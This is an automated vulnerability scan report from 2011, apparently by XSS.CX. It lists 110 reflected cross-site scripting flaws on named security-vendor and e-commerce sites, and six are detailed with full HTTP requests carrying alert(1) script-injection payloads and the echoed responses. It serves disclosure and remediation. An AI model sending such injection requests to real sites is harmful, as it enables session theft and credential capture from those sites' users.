XSS, Reflected Cross Site Scripting, Javascript, Injection, Arbitrary, Attribute, 10232011-01

Report generated by XSS.CX at Sun Oct 23 12:19:58 CDT 2011.


1. Cross-site scripting (reflected)

1.1. http://c2.softonicads.com/cgi-bin/request [jsoncallback parameter]

1.2. http://display.digitalriver.com/ [aid parameter]

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

1.4. http://display.digitalriver.com/ [tax parameter]

1.5. http://home.mcafee.com/ [name of an arbitrarily supplied request parameter]

1.6. http://home.mcafee.com/Default.aspx [name of an arbitrarily supplied request parameter]

1.7. http://pctools.tt.omtrdc.net/m2/pctools/mbox/standard [mbox parameter]

1.8. http://sales.liveperson.net/hc/2735064/ [msessionkey parameter]

1.9. https://secure.avangate.com/order/cart.php [CART_ID parameter]

1.10. https://secure.avangate.com/order/cart.php [SHOPURL parameter]

1.11. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

1.12. https://secure.avangate.com/order/cart.php [name of an arbitrarily supplied request parameter]

1.13. https://secure.avangate.com/order/checkout.php [CART_ID parameter]

1.14. https://secure.avangate.com/order/checkout.php [name of an arbitrarily supplied request parameter]

1.15. https://secure.element5.com/esales/checkout.html [name of an arbitrarily supplied request parameter]

1.16. https://secure.element5.com/esales/product.html [name of an arbitrarily supplied request parameter]

1.17. https://secure.k7computing.com/esales/checkout.html [name of an arbitrarily supplied request parameter]

1.18. https://secure.k7computing.com/esales/faxorder.html [name of an arbitrarily supplied request parameter]

1.19. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._COUNTRY parameter]

1.20. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPC parameter]

1.21. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPD parameter]

1.22. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPF parameter]

1.23. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._IPV parameter]

1.24. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._LANGUAGE parameter]

1.25. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._PGM_ID parameter]

1.26. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._PGM_TYPE parameter]

1.27. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._SUBCHANNEL parameter]

1.28. http://symantec.tt.omtrdc.net/m2/symantec/mbox/standard [profile._TRAFFIC_SOURCE parameter]

1.29. http://trk.enecto.com/trk/3 [z parameter]

1.30. http://usa.kaspersky.com/ [name of an arbitrarily supplied request parameter]

1.31. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1]

1.32. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 1]

1.33. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

1.34. http://usa.kaspersky.com/modules/search/search.css [REST URL parameter 2]

1.35. http://usa.kaspersky.com/products-services/home-computer-security/one [ICID parameter]

1.36. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 1]

1.37. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 1]

1.38. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 2]

1.39. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 2]

1.40. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 3]

1.41. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 3]

1.42. http://usa.kaspersky.com/products-services/home-computer-security/one [name of an arbitrarily supplied request parameter]

1.43. http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one [ICID parameter]

1.44. http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one [ICID parameter]

1.45. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

1.46. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

1.47. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 1]

1.48. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 1]

1.49. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 2]

1.50. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 2]

1.51. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 3]

1.52. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 3]

1.53. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 4]

1.54. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 4]

1.55. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 1]

1.56. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 1]

1.57. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 2]

1.58. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 2]

1.59. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 3]

1.60. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 3]

1.61. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 4]

1.62. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_144.css [REST URL parameter 4]

1.63. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 1]

1.64. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 1]

1.65. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 2]

1.66. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 2]

1.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 3]

1.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 3]

1.69. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 4]

1.70. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_153.css [REST URL parameter 4]

1.71. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1]

1.72. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 1]

1.73. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2]

1.74. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 2]

1.75. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3]

1.76. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 3]

1.77. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4]

1.78. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 4]

1.79. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5]

1.80. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 5]

1.81. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6]

1.82. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/ctools/css/4d9813e9d0c158247f09dd5a908f5979.css [REST URL parameter 6]

1.83. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [REST URL parameter 5]

1.84. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [REST URL parameter 5]

1.85. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [name of an arbitrarily supplied request parameter]

1.86. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/img/green-bullet-point.jpg [name of an arbitrarily supplied request parameter]

1.87. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 1]

1.88. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 1]

1.89. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 2]

1.90. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 2]

1.91. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 3]

1.92. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 3]

1.93. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 4]

1.94. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_52.js [REST URL parameter 4]

1.95. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 1]

1.96. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 1]

1.97. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 2]

1.98. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 2]

1.99. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 3]

1.100. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 3]

1.101. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 4]

1.102. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/js_injector_55.js [REST URL parameter 4]

1.103. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 1]

1.104. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 2]

1.105. http://www.avira.com/search/frontendSc/autocomplete [REST URL parameter 3]

1.106. http://www.f-secure.com/en/web/home_global/news-info/product-news-offers/view/story/463302/F-Secure%20Internet%20Security%202012%20-%20Complete%20Protection%20for%20Your%20Computer%20and%20Online%20Life [name of an arbitrarily supplied request parameter]

1.107. http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91771/Parenting%20the%20digital%20natives [name of an arbitrarily supplied request parameter]

1.108. http://www.f-secure.com/en/web/home_global/news-info/security-stories/view/story/91782/Safer%20online%20shopping [name of an arbitrarily supplied request parameter]

1.109. http://www.gdatasoftware.co.uk/online-shop/anti-virus-produkte/shop/23-private-user/1594-g-data-totalcare-2012.html [REST URL parameter 4]

1.110. http://www.bitdefender.com/solutions/total-security.html [Referer HTTP header]



1. Cross-site scripting (reflected)
There are 110 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://c2.softonicads.com/cgi-bin/request [jsoncallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c2.softonicads.com
Path:   /cgi-bin/request

Issue detail

The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 5dbc2<script>alert(1)</script>68459b59f86 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/request?targeting=3&country=US&instance=2&limit=4&platform=1177&jsoncallback=json_process_cpc5dbc2<script>alert(1)</script>68459b59f86&section=1177 HTTP/1.1
Host: c2.softonicads.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://en.softonic.com/phones
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:31:43 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 1737
Connection: close
Content-Type: application/json

json_process_cpc5dbc2<script>alert(1)</script>68459b59f86( {
   "ads_list":    [{
           "sph_id":    0,
           "id_ad":    3708,
           "id_key_sec":    1177,
           "id_platform":    1,
           "id_campaign":    1679,
           "title":    "Idea Flight",
           "custom_version":    "",
           "description":    "The only
...[SNIP]...

1.2. http://display.digitalriver.com/ [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d02e5'-alert(1)-'1d9eae90bbe was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244d02e5'-alert(1)-'1d9eae90bbe&tax=trend_micro HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://us.trendmicro.com/us/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op537homegum=a00602v02x27a6r03i314863e

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:26:55 GMT
Server: Apache/2.2.9
Expires: Sun, 23 Oct 2011 16:56:55 GMT
Last-Modified: Sun, 23 Oct 2011 16:26:55 GMT
Content-Length: 237
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244d02e5'-alert(1)-'1d9eae90bbe&tax=trend_micro';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.3. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2197'-alert(1)-'30da97cd78e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=trend_micro&c2197'-alert(1)-'30da97cd78e=1 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://us.trendmicro.com/us/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op537homegum=a00602v02x27a6r03i314863e

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:26:57 GMT
Server: Apache/2.2.9
Expires: Sun, 23 Oct 2011 16:56:57 GMT
Last-Modified: Sun, 23 Oct 2011 16:26:57 GMT
Content-Length: 240
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=trend_micro&c2197'-alert(1)-'30da97cd78e=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.4. http://display.digitalriver.com/ [tax parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b44e'-alert(1)-'b8c58074559 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=trend_micro9b44e'-alert(1)-'b8c58074559 HTTP/1.1
Host: display.digitalriver.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://us.trendmicro.com/us/home/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=94877326.899275530.1315145846.1315145846.1315145846.1; __utmz=94877326.1315145846.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); op537homegum=a00602v02x27a6r03i314863e

Response

HTTP/1.1 200 OK
Date: Sun, 23 Oct 2011 16:26:56 GMT
Server: Apache/2.2.9
Expires: Sun, 23 Oct 2011 16:56:56 GMT
Last-Modified: Sun, 23 Oct 2011 16:26:56 GMT
Content-Length: 237
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=trend_micro9b44e'-alert(1)-'b8c58074559';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

1.5. http://home.mcafee.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 473ee'><script>alert(1)</script>53f145d563c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?473ee'><script>alert(1)</script>53f145d563c=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafee.com/us/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273B41F7051D1961-400001298006D38B[CE]; SiteID=1; langid=1; Locale=EN-US; HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; mbox=session#1317384062138-394024#1317387183|PC#1317384062138-394024.19#1319977323|check#true#1317385383; isvt_visitor=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW; s_ev8=%5B%5B%27direct%27%2C%271317384116696%27%5D%2C%5B%27mcafee%27%2C%271317385148375%27%5D%2C%5B%27direct%27%2C%271317385426538%27%5D%5D; CookieInformation=locale=us; s_cc=true; s_nr=1319387329167-Repeat; s_sq=mcafeecomglobal%3D%2526pid%253Dcorp%25253Aen-us%25253Adirect%25253Amcafee%25253Asegment_page%2526pidt%253D1%2526oid%253Dhttp%25253A//home.mcafee.com/%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 23-Oct-2041 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:43 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fvirusinfo%2f&pple=iq5nNK-ISQc78yUmSkAv9A2&inur=iq5nNK-ISQc78yUmSkAv9A2&ituof=iq5nNK-ISQc78yUmSkAv9A2&isr=iq5nNK-ISQc78yUmSkAv9A2&sbo=iq5nNK-ISQc78yUmSkAv9A2&om_icr=iq5nNK-ISQc78yUmSkAv9A2&om_upsa=iq5nNK-ISQc78yUmSkAv9A2&ttprdt=iq5nNK-ISQc78yUmSkAv9A2&flgn=iq5nNK-ISQc78yUmSkAv9A2&pbinfo=iq5nNK-ISQc78yUmSkAv9A2; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV5
Date: Sun, 23 Oct 2011 16:29:42 GMT
Content-Length: 2836

<HTML>
<head></head>
<body>
   <form id = 'frmPIO' name = 'frmPIO' action='http://home.mcafee.com/Default.aspx?473ee'><script>alert(1)</script>53f145d563c=1' method='post'>
       <input type ='hidden' i
...[SNIP]...

1.6. http://home.mcafee.com/Default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86fda'><script>alert(1)</script>9ebe5510c46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Default.aspx?86fda'><script>alert(1)</script>9ebe5510c46=1 HTTP/1.1
Host: home.mcafee.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafee.com/us/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273B41F7051D1961-400001298006D38B[CE]; mbox=session#1317384062138-394024#1317387183|PC#1317384062138-394024.19#1319977323|check#true#1317385383; isvt_visitor=YUPutwoBC2cAAAx@cYwAAAAAABOUS9tR4FyeWW; s_ev8=%5B%5B%27direct%27%2C%271317384116696%27%5D%2C%5B%27mcafee%27%2C%271317385148375%27%5D%2C%5B%27direct%27%2C%271317385426538%27%5D%5D; CookieInformation=locale=us; s_cc=true; s_nr=1319387329167-Repeat; s_sq=mcafeecomglobal%3D%2526pid%253Dcorp%25253Aen-us%25253Adirect%25253Amcafee%25253Asegment_page%2526pidt%253D1%2526oid%253Dhttp%25253A//home.mcafee.com/%2526ot%253DA; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; SessionInfo=AffiliateId=0; lBounceURL=http://home.mcafee.com/; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Locale=EN-US; HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; AffID=0-0; Currency=56; HRntm=aff=0-0&cur=56&lbu=http%3a%2f%2fhome.mcafee.com%2f&pple=iq5nNK-ISQc78yUmSkAv9A2&inur=iq5nNK-ISQc78yUmSkAv9A2&ituof=iq5nNK-ISQc78yUmSkAv9A2&isr=iq5nNK-ISQc78yUmSkAv9A2&sbo=iq5nNK-ISQc78yUmSkAv9A2&om_icr=iq5nNK-ISQc78yUmSkAv9A2&om_upsa=iq5nNK-ISQc78yUmSkAv9A2&ttprdt=iq5nNK-ISQc78yUmSkAv9A2&flgn=iq5nNK-ISQc78yUmSkAv9A2&pbinfo=iq5nNK-ISQc78yUmSkAv9A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=1; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: langid=1; domain=mcafee.com; expires=Wed, 23-Oct-2041 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: SessionInfo=AffiliateId=0; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=6f17ff2e-8a72-4e21-ad27-857754422b35&loc=EN-US; domain=mcafee.com; expires=Sat, 23-Oct-2021 16:29:57 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=56; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=56&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fvirusinfo%2f&pple=iq5nNK-ISQc78yUmSkAv9A2&inur=iq5nNK-ISQc78yUmSkAv9A2&ituof=iq5nNK-ISQc78yUmSkAv9A2&isr=iq5nNK-ISQc78yUmSkAv9A2&sbo=iq5nNK-ISQc78yUmSkAv9A2&om_icr=iq5nNK-ISQc78yUmSkAv9A2&om_upsa=iq5nNK-ISQc78yUmSkAv9A2&ttprdt=iq5nNK-ISQc78yUmSkAv9A2&flgn=iq5nNK-ISQc78yUmSkAv9A2&pbinfo=iq5nNK-ISQc78yUmSkAv9A2; domain=mcafee.com; path=/; HttpOnly
X-Powered-By: ASP.NET
MS: SJV8
Date: Sun, 23 Oct 2011 16:29:56 GMT
Content-Length: 2836

<HTML>
<head></head>
<body>
   <form id = 'frmPIO' name = 'frmPIO' action='http://home.mcafee.com/Default.aspx?86fda'><script>alert(1)</script>9ebe5510c46=1' method='post'>
       <input type ='hidden' i
...[SNIP]...

